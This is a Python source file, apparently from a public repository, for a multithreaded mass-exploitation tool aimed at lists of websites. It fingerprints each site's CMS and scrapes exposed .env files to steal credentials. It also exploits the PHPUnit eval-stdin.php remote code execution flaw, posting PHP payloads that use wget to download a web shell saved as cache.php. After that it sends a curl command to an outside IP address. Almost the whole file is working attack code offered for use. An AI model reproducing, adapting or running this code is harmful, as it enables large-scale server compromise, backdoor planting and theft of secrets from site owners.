You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 

620 lines
31 KiB

#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import argparse
import logging
import multiprocessing
import os
import re
import socket
import sys
ver=sys.version.split(" ")[0].split(".")
sys.path.append('.env/lib/python'+ver[0]+'.'+ver[1]+'/site-packages/')
import traceback
import warnings
from itertools import islice
from multiprocessing.dummy import Pool as ThreadPool
from urllib.parse import urlparse
import numpy as np
import requests
import urllib3
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
warnings.simplefilter('ignore', InsecureRequestWarning)
DEBUG = False
FORCE_SCAN = False
TIME_OUT = 10
SHELL_CODE = 'https://raw.githubusercontent.com/rintod/toolol/master/payload.php'
SHELL_NAME = 'cache.php'
EXTRA_PATH = []
# EXTRA_COMMAND = 'for pid in $(ps -ef | awk \'/sbin|apache|curl/ {print $2}\'); do kill -9 $pid; done'
EXTRA_COMMAND = 'curl -sk http://50.19.199.172/index.php?c=1'
PATH_ROOT = os.path.dirname(os.path.realpath(__file__))
PATH_RESULT = os.path.join(PATH_ROOT, 'results')
PATH_CMS = os.path.join(PATH_ROOT, 'cms')
FILE_RESULT = os.path.join(PATH_ROOT, 'result.txt')
FILE_RESULT_INDEX_OF = os.path.join(PATH_ROOT, 'result_index_of.txt')
ATTACK = []
DEFAULT_HEADER = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',
'referer': 'https://www.google.com/',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9',
}
CMS_LIST = {
'Wordpress': '(wp-content\/(themes|plugins|mu\-plugins)\/[^\n\s]+\.(js|css)|name\=\"generator\"\scontent\=\"WordPress|\/xmlrpc\.php)',
'Joomla': '(var\sJoomla|name\=\"generator[^\n]+Joomla!|\/com\_[a-z0-9]+\/)',
'Drupal': '(\/sites\/default\/files|extend\(Drupal|node_link_text|name\=\"generator[^\n><]+(Drupal\s([^\s,]+)))',
'MediaWiki': '(name\=\"generator[^\n]+MediaWiki|mediawiki\.(user|hidpi|searchSuggest)|Powered\sby\sMediaWiki|mw\.user\.tokens)',
'PrestaShop': '(modules?\/(tmsearch|topbanner|gsnippetsreviews)\/(search|FrontAjaxTopbanner|views)|comparedProductsIds\=\[\]|var\scomparator_max_item|name\=\"generator\"[^\n]+PrestaShop|license@prestashop\.com|@copyright[^\n]+PrestaShop|var\sprestashop_version)',
'ZenCart': '(name\=\"generator[^\n]+(Zen\sCart|The\sZen\sCart|zen\-cart\.com\seCommerce)|products\_id\=[^=]+zenid|zencart\/|main_page=[^=]+cPath\=\d)',
'vBulletin': '(name\=\"generator[^\n]+vBulletin|[^\n]\"vbulletinlink|vb_login_[^\s]+|vbulletin\-core)',
'Discuz': '(name\=\"generator[^\n]+Discuz|discuz_uid|discuz_tips)',
'Magento': '(Mage\.Cookies\.)',
'Invision': '(<([^<]+)?(Invision\sPower)([^>]+)?>|ipb\_[^\n\'=\s]+)',
'OpenCart': '(name\=\"generator[^\n]+OpenCart|index\.php\?route=(common|checkout|account)|catalog\/view\/theme\/[^\s\n]+\.(js|css|png|jpg))',
'phpBB': '(name\=\"generator[^\n]+phpbb|Powered\sby[^\n]+(phpBB|phpbb\.com)|viewtopic\.php\?f=\d+)',
'Whmcs': '(templates\/.*(pwreset|dologin|submitticket|knowledgebase)\.php)',
'Moodle': '(\^moodle-/|moodle-[a-z0-9_-]+)',
'YetAnotherForum': '(\syaf\.controls\.SmartScroller|\syaf_[a-z0-9_-]+)',
'Jive': '(jive([^a-z]+)(app|Onboarding|nitro|rest|rte|ext))',
'Lithium': '(LITHIUM\.(DEBUG|Loader|Auth|Components|Css|useCheckOnline|RenderedScripts))',
'Esportsify': 'esportsify\.com/([^.]+).(js|css)',
'FluxBB': '(<p[^\n]+FluxBB)',
'osCommerce': '(oscsid\=[^"]+)',
'Ning': '(([a-z0-9-]+)\.ning\.com|ning\.(loader)|ning\._)',
'Zimbra': '(\=new\sZmSkin\(\)|iconURL\:\"\/img\/logo\/ImgZimbraIcon)',
'Symfony':'(Symfony Web Debug Toolbar)',
}
REGEX_INDEX_OF = '(023.jsp|零魂PHP一句话木马客户端.htm|银河舰队大马_2015专版asp大马.asp|草莓webshell.asp|xx.php|.*hcker.asp|xslt.php|(webshell|tmp|cache|shell|command|payload|exec|cmd)\.(phtml|htm|php[0-10]?|asp|aspx)|perl\.alfa|bash\.alfa|py\.alfa|ALFA_DATA|alfacgiapi|alfasymlink|cgialfa|\.env|(Uploading|uploader|downloader|upfile_write|up|download|upload|file|img|image)\.(html|phtml|htm|php[0-10]?|asp|aspx))'
def clean(v):
return re.sub(r"\s#[^\n]+", "", v)
def convert_tuple(lst):
res_dct = {lst[i]: lst[i + 1] for i in range(0, len(lst), 2)}
return res_dct
def make_safe_filename(s):
def safe_char(c):
if c.isalnum():
return c
else:
return "_"
return "".join(safe_char(c) for c in s).rstrip("_")
def check_url(url):
result = {'ready': None, 'cms': 'Unknown', 'message': 'Unknown', 'content': ''}
try:
http = requests.session()
req = http.get(url, timeout=5, verify=False, allow_redirects=True, headers=DEFAULT_HEADER)
raw = req.content.decode(encoding='utf-8', errors='ignore')
result.update(content=str(raw), ready=True)
if not os.path.exists(PATH_CMS):
os.mkdir(PATH_CMS)
for cms, regex in CMS_LIST.items():
try:
if re.search(r'%s' % regex, raw):
result.update(cms=cms)
result_file = os.path.join(PATH_CMS, '%s.list' % cms)
try:
with open(result_file, 'a+') as a:
a.seek(0, os.SEEK_END)
a.write('%s\n' % url)
a.close()
except Exception as ex:
print(''.join(traceback.format_exception(etype=type(ex), value=ex, tb=ex.__traceback__)))
pass
break
else:
if http.cookies.get('XSRF-TOKEN'):
result.update(cms='Laravel')
result_file = os.path.join(PATH_CMS, '%s.list' % 'Laravel')
try:
with open(result_file, 'a+') as a:
a.seek(0, os.SEEK_END)
a.write('%s\n' % url)
a.close()
except Exception as ex:
print(''.join(traceback.format_exception(etype=type(ex), value=ex, tb=ex.__traceback__)))
pass
break
elif http.cookies.get('ZM_LOGIN_CSRF'):
result.update(cms='Zimbra')
result_file = os.path.join(PATH_CMS, '%s.list' % 'Zimbra')
try:
with open(result_file, 'a+') as a:
a.seek(0, os.SEEK_END)
a.write('%s\n' % url)
a.close()
except Exception as ex:
print(''.join(traceback.format_exception(etype=type(ex), value=ex, tb=ex.__traceback__)))
pass
break
elif http.cookies.get('X-Debug-Token-Link'):
result.update(cms='Codeigniter')
result_file = os.path.join(PATH_CMS, '%s.list' % 'symfony')
try:
with open(result_file, 'a+') as a:
a.seek(0, os.SEEK_END)
a.write('%s\n' % url)
a.close()
except Exception as ex:
print(''.join(traceback.format_exception(etype=type(ex), value=ex, tb=ex.__traceback__)))
pass
break
else:
continue
except Exception as ex:
print(''.join(traceback.format_exception(etype=type(ex), value=ex, tb=ex.__traceback__)))
pass
match = re.search(r"<\s?title\s?>([^\n<>]+)<\/\s?title\s?>", raw)
if match:
result.update(message=str(match.group(1)), ready=True)
else:
result.update(message=req.reason, ready=True)
except (
requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout,
requests.exceptions.SSLError, requests.exceptions.ConnectionError, AttributeError,
ConnectionRefusedError, socket.timeout, urllib3.exceptions.ReadTimeoutError,
urllib3.exceptions.DecodeError, requests.exceptions.ContentDecodingError):
result.update(message="Can't connect or Timeout", ready=False)
except KeyboardInterrupt:
raise KeyboardInterrupt
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
pass
finally:
if result.get('ready') and result.get('cms') == 'Unknown':
result_file = os.path.join(PATH_CMS, 'Unknown.list')
try:
with open(result_file, 'a+') as a:
a.seek(0, os.SEEK_END)
a.write('%s\n' % url)
a.close()
except:
pass
if result.get('ready') and re.search(r"^Index\sof\s\/", result.get("message")):
result_index_of = os.path.join(PATH_ROOT, 'index_of.list')
try:
with open(result_index_of, 'a+') as a:
a.seek(0, os.SEEK_END)
a.write('%s\n' % url)
a.close()
except:
pass
#add parse index of directory
try:
# print(raw)
pattern = re.escape(REGEX_INDEX_OF)
# print(type(pattern), pattern)
matches = re.findall(r'%s' % REGEX_INDEX_OF.lower(), raw.lower())
# print(type(matches), matches)
if matches:
try:
with open(FILE_RESULT_INDEX_OF, 'a+') as a:
a.seek(0, os.SEEK_END)
a.write('\n===============================%s===============================\n' % url)
unique_matches = set()
for match in matches:
unique_matches.add(match[0])
for unique in unique_matches:
a.write(unique + '\n')
a.close()
except:
print('error 2')
pass
except:
print('error 1')
pass
return result
def scan_env(url, force=False):
result_env = {'vuln': None, 'message': 'Unknown', 'content': None}
if not os.path.exists(PATH_RESULT):
os.mkdir(PATH_RESULT)
parsed = urlparse(url)
if parsed.scheme:
target = '{}://{}'.format(parsed.scheme if parsed.scheme in ['http', 'https'] else 'http', parsed.netloc)
else:
target = 'http://{}'.format(url)
vuln_paths = ['.env', '.remote', '.local', '.production']
RHOST = urlparse(target).netloc
FILE_RESULT_ENV = os.path.join(PATH_RESULT, '%s.txt' % RHOST.strip())
if not os.path.isfile(FILE_RESULT_ENV) or force:
try:
http = requests.session()
for vuln_path in vuln_paths:
try:
url_bug = '/'.join([target, vuln_path])
resp = http.get(url_bug, timeout=15, verify=False, allow_redirects=True,
headers=DEFAULT_HEADER)
raw = resp.text
result_env.update(content=raw)
raw_vuln = re.compile(r"([A-Z]+_[A-Z]+\s?=[^\n]+)").search(raw)
vuln_env = not re.search(r"(\?>|<[^\n]+>)", raw, re.MULTILINE) and raw_vuln
if vuln_env:
if DEBUG:
print('%s\n' % raw, end='')
message = raw_vuln.group(1).strip()
result_env.update(message=message, vuln=True)
with open(FILE_RESULT_ENV, 'a+') as w:
w.write(resp.text)
w.close()
with open(FILE_RESULT, 'a+') as a:
a.seek(0, os.SEEK_END)
a.write('\n===============================%s===============================\n' % RHOST)
a.write(raw)
a.close()
else:
message = '%d : %s' % (resp.status_code, resp.reason)
result_env.update(message=message)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
pass
finally:
if result_env.get('vuln'):
break
except KeyboardInterrupt:
raise KeyboardInterrupt
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
pass
return result_env
def scan_phpunit(url, extra_path=[]):
result_phpunit = {'vuln': None, 'message': 'Unknown'}
payloads = {
'test': '<?php echo \'RCE_VULN|\'; echo php_uname();?>',
'default': '<?php @system(sprintf(\'wget -O %s {{shell}} '
'--no-check-certificate\', join(DIRECTORY_SEPARATOR,array(__DIR__,'
'\'{{shellname}}\'))));echo file_exists(join(DIRECTORY_SEPARATOR,array(__DIR__,'
'\'{{shellname}}\')))?\'RCE_VULN\' : \'FAILED\';?>',
'laravel': '<?php @system(sprintf(\'wget -O %s {{shell}} '
'--no-check-certificate\', is_writable(__DIR__) ? \'{{shellname}}\' : join('
'DIRECTORY_SEPARATOR,array(preg_replace(\'%vendor\/[^\n]+%\', '
'\'storage/framework/\',__DIR__),\'{{shellname}}\'))));echo file_exists(is_writable('
'__DIR__) ? \'{{shellname}}\' : join(DIRECTORY_SEPARATOR,array(preg_replace('
'\'%vendor\/[^\n]+%\', \'storage/framework/\',__DIR__),'
'\'{{shellname}}\')))?\'RCE_VULN\' : \'FAILED\';?>',
'drupal': '<?php @system(sprintf(\'wget -O %s {{shell}} '
'--no-check-certificate\', is_writable(__DIR__) ? \'{{shellname}}\' : join('
'DIRECTORY_SEPARATOR,array(preg_replace(\'%\/sites/all/[^\n]+%\',\'/sites/default/files/\','
'__DIR__),\'{{shellname}}\'))));echo file_exists(is_writable('
'__DIR__) ? \'{{shellname}}\' : join(DIRECTORY_SEPARATOR,array(preg_replace('
'\'%\/sites/all/[^\n]+%\', \'/sites/default/files/\',__DIR__),'
'\'{{shellname}}\')))?\'RCE_VULN\' : \'FAILED\';?>',
}
vuln_paths = [
"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php",
"/vendor/phpunit/src/Util/PHP/eval-stdin.php",
"/vendor/phpunit/Util/PHP/eval-stdin.php",
"/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/phpunit/phpunit/Util/PHP/eval-stdin.php",
"/phpunit/src/Util/PHP/eval-stdin.php",
"/phpunit/Util/PHP/eval-stdin.php",
"/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/lib/phpunit/phpunit/Util/PHP/eval-stdin.php",
"/lib/phpunit/src/Util/PHP/eval-stdin.php",
"/lib/phpunit/Util/PHP/eval-stdin.php",
"/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
"/protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
]
if not os.path.exists(PATH_RESULT):
os.mkdir(PATH_RESULT)
parsed = urlparse(url)
if parsed.scheme:
target = '{}://{}'.format(parsed.scheme if parsed.scheme in ['http', 'https'] else 'http', parsed.netloc)
else:
target = 'http://{}'.format(url)
vuln_paths = np.unique(vuln_paths + extra_path)
RHOST = urlparse(target).netloc
payloads = {k: v.replace('{{shell}}', SHELL_CODE).replace('{{shellname}}', SHELL_NAME) for k, v in payloads.items()}
payload_test = payloads.get('test')
payload = payloads.get('default')
FILE_RESULT_RCE = os.path.join(PATH_ROOT, 'result-rce.txt')
FILE_FAIL_RCE = os.path.join(PATH_ROOT, 'fail-rce.txt')
FILE_RESULT_HOST = os.path.join(PATH_RESULT, '%s.txt' % RHOST.strip())
try:
http = requests.session()
for rce in vuln_paths:
rce_bug = '/'.join([target, rce])
extra_cmd = '<?php @system(\"%s\");?>' % EXTRA_COMMAND
try:
if DEBUG:
print('[Exploiting] %s\n' % rce_bug, end='')
res_cek = http.post(rce_bug, timeout=5, verify=False, allow_redirects=False,
headers=DEFAULT_HEADER, data=payload_test)
raw_cek = res_cek.content.decode(encoding='utf-8', errors='ignore')
rce_vuln = 'RCE_VULN' in raw_cek and not re.search(r"(\?>|<[^\n]+>)", raw_cek, re.MULTILINE)
if rce_vuln:
kernel = raw_cek.split('|')[-1]
result_phpunit.update(message=kernel, vuln=True)
try:
if rce == '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php':
payload = payloads.get('laravel')
elif rce == '/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php':
payload = payloads.get('drupal')
res_rce = http.post(rce_bug, timeout=TIME_OUT, verify=False,
allow_redirects=False,
headers=DEFAULT_HEADER, data=payload)
rce_raw = res_rce.content.decode(encoding='utf-8', errors='ignore')
if 'RCE_VULN' in rce_raw:
with open(FILE_RESULT_HOST, 'a+') as y:
y.write('%s\n' % rce_bug)
y.close()
with open(FILE_RESULT_RCE, 'a+') as a:
if rce == '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php':
a.write('%s\n' % re.sub(r"vendor\/[^\n]+", 'storage/framework/%s' % SHELL_NAME,
rce_bug))
elif rce == '/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php':
a.write('%s\n' % re.sub(r"\/sites/all\/[^\n]+", '/sites/default/files//%s' %
SHELL_NAME,
rce_bug))
else:
a.write('%s\n' % rce_bug.replace("eval-stdin.php", SHELL_NAME))
a.close()
try:
http.post(rce_bug, timeout=TIME_OUT, verify=False,
allow_redirects=False,
headers=DEFAULT_HEADER, data=extra_cmd)
except:
pass
else:
with open(FILE_RESULT_HOST, 'a+') as a:
a.write('%s\n' % rce_bug)
a.close()
with open(FILE_FAIL_RCE, 'a+') as x:
x.write('%s\n' % rce_bug)
x.close()
try:
http.post(rce_bug, timeout=TIME_OUT, verify=False, allow_redirects=False,
headers=DEFAULT_HEADER, data=extra_cmd)
except:
pass
except:
with open(FILE_RESULT_HOST, 'a+') as a:
a.write('%s\n' % rce_bug)
a.close()
with open(FILE_FAIL_RCE, 'a+') as x:
x.write('%s\n' % rce_bug)
x.close()
pass
else:
match = re.search(r"<\s?title\s?>([^\n<>]+)<\/\s?title\s?>", raw_cek)
if match:
result_phpunit.update(message=str(match.group(1)), ready=True)
else:
result_phpunit.update(message=res_cek.reason, ready=True)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
pass
finally:
if result_phpunit.get('vuln'):
break
except KeyboardInterrupt:
raise KeyboardInterrupt
except Exception as error:
logging.exception(''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
pass
return result_phpunit
def do_check(url, attk=['all'], extra_path=[], force=False):
parsed = urlparse(url)
if parsed.scheme:
target = '{}://{}'.format(parsed.scheme if parsed.scheme in ['http', 'https'] else 'http', parsed.netloc)
else:
target = 'http://{}'.format(url)
AHOST = urlparse(target).netloc
try:
raw_check = check_url(target)
cms = raw_check.get('cms')
if raw_check.get('ready'):
print("[!]%s : %s ~ %s" % (AHOST, cms, raw_check.get('message').strip()))
if any(ev in 'env' for ev in attk) or any(ev in 'all' for ev in attk):
env = scan_env(target, force)
if bool(env.get('vuln')):
print(style.GREEN('[+] ') + style.BLUE(AHOST) + style.RESET(' [ENV] ') + style.YELLOW(cms) +
style.RESET(' : ') + style.RESET(env.get('message')))
else:
print(style.RED('[x] ') + style.BLUE(AHOST) + style.RESET(' [ENV] ') + style.YELLOW(
cms) + style.RESET(' : ') + style.RESET(env.get('message')))
if any(ev in 'phpunit' for ev in attk) or any(ev in 'all' for ev in attk):
phpunit = scan_phpunit(target, extra_path)
if bool(phpunit.get('vuln')):
print(
style.GREEN('[+] ') + style.BLUE(AHOST) + style.RESET(' [PHPUNIT] ') + style.YELLOW(cms) +
style.RESET(' : ') + style.RESET(
phpunit.get('message')))
else:
print(
style.RED('[x] ') + style.BLUE(AHOST) + style.RESET(' [PHPUNIT] ') + style.YELLOW(
cms) + style.RESET(' : ') + style.RESET(phpunit.get('message')))
else:
print(style.RED('[x] ') + style.BLUE(AHOST) + style.YELLOW(cms) + style.RESET(' : ') + style.RESET(
raw_check.get('message')))
except KeyboardInterrupt:
raise KeyboardInterrupt
except Exception as ex:
print(''.join(traceback.format_exception(etype=type(ex), value=ex, tb=ex.__traceback__)))
def support_format(str_ip):
parsed = urlparse(str_ip)
if parsed.scheme:
target = '{}://{}'.format(parsed.scheme if parsed.scheme in ['http', 'https'] else 'http',
clean_netloc(parsed.netloc))
elif not parsed.scheme and parsed.netloc:
target = 'http://{}'.format(clean_netloc(parsed.netloc))
else:
target = 'http://{}'.format(clean_netloc(str_ip))
return target.replace('\r', '').replace('\n', '')
def clean_netloc(netloc):
return re.sub(r"^(cpanel|www|whm|webmail|mail|webdisk|dc-[0-9]+)\.", "", netloc)
def is_valid_ip(ip_str):
reg = r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"
if re.match(reg, ip_str):
return True
else:
return False
def is_valid_hostname(hostname):
if hostname[-1] == ".":
hostname = hostname[:-1]
if len(hostname) > 253:
return False
labels = hostname.split(".")
if re.match(r"[0-9]+$", labels[-1]):
return False
allowed = re.compile(r"(?!-)[a-z0-9-]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(label) for label in labels)
def support_input(url):
try:
result = urlparse(url)
if all([result.scheme, result.netloc]):
return True
else:
return is_valid_ip(url) or is_valid_hostname(url)
except:
return is_valid_ip(url) or is_valid_hostname(url)
# auxiliary funciton to make it work
def map_helper(args):
return do_check(*args)
class style():
BLACK = lambda x: '\033[30m' + str(x)
RED = lambda x: '\033[31m' + str(x)
GREEN = lambda x: '\033[32m' + str(x)
YELLOW = lambda x: '\033[33m' + str(x)
BLUE = lambda x: '\033[34m' + str(x)
MAGENTA = lambda x: '\033[35m' + str(x)
CYAN = lambda x: '\033[36m' + str(x)
WHITE = lambda x: '\033[37m' + str(x)
UNDERLINE = lambda x: '\033[4m' + str(x)
RESET = lambda x: '\033[0m' + str(x)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
conflict_handler='resolve',
description='.Env scanner',
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-l', action='store', dest='file_list',
help='List file', default=None)
parser.add_argument('-a', action='store', dest='attack_list',
help='Attack list', type=str, default='all')
parser.add_argument('-t', action="store", dest="max_thread", type=int, default=multiprocessing.cpu_count() + 2)
parser.add_argument('-shell', action="store", dest="shell_code", help='shell code url', type=str,
default=SHELL_CODE)
parser.add_argument('-name', action="store", dest="shell_name", help='shell name', type=str, default=SHELL_NAME)
parser.add_argument('-custom', action="store", dest="custom", help='custom', type=str, default='paths.txt')
parser.add_argument('-timeout', action="store", dest="timeout", type=int, default=10)
parser.add_argument('-d', action='store_true', dest='debug',
help='show debug', default=False)
parser.add_argument('-f', action='store_true', dest='force',
help='force scan if already scanned', default=False)
args = parser.parse_args()
if 'file_list' not in args or not args.file_list:
parser.print_help()
sys.exit(1)
else:
FILE_LIST = [l.strip() for l in args.file_list.split(",")]
MAX_THREAD = args.max_thread
DEBUG = args.debug
FORCE = args.force
TIME_OUT = args.timeout
SHELL_NAME = args.shell_name
SHELL_CODE = args.shell_code
customs = args.custom
LIST_URL = []
ATTACK = [a.strip() for a in args.attack_list.split(",")]
try:
for l in FILE_LIST:
file = l.strip()
print(style.YELLOW("Filtering list of {} .....\r".format(file)), flush=True)
chnk = 2500
counter = 0
try:
with open(file, 'r') as fp:
while True:
lines = list(islice(fp, chnk))
for line in lines:
if support_input(line):
LIST_URL.append(support_format(line))
if not lines:
break
except:
pass
except Exception as ex:
print(''.join(traceback.format_exception(etype=type(ex), value=ex, tb=ex.__traceback__)))
pass
try:
if customs:
try:
with open(customs, 'r') as c:
for line in c.readlines():
if re.search("eval-stdin.php", line, re.IGNORECASE):
EXTRA_PATH.append(line.strip())
except Exception as ex:
pass
if LIST_URL:
print(style.YELLOW('Starting {} jobs with {} workers'.format(len(LIST_URL), MAX_THREAD)))
iterable = [(i.strip(), ATTACK, EXTRA_PATH, FORCE) for i in LIST_URL]
with ThreadPool(MAX_THREAD) as pool:
try:
results = pool.map(map_helper, iterable)
except (SystemExit, KeyboardInterrupt):
pool.close()
pool.terminate()
raise KeyboardInterrupt('Cancelled....!')
finally:
pool.close()
pool.join()
except KeyboardInterrupt:
print("Caught KeyboardInterrupt, terminating workers")
except Exception as ex:
print(''.join(traceback.format_exception(etype=type(ex), value=ex, tb=ex.__traceback__)))
pass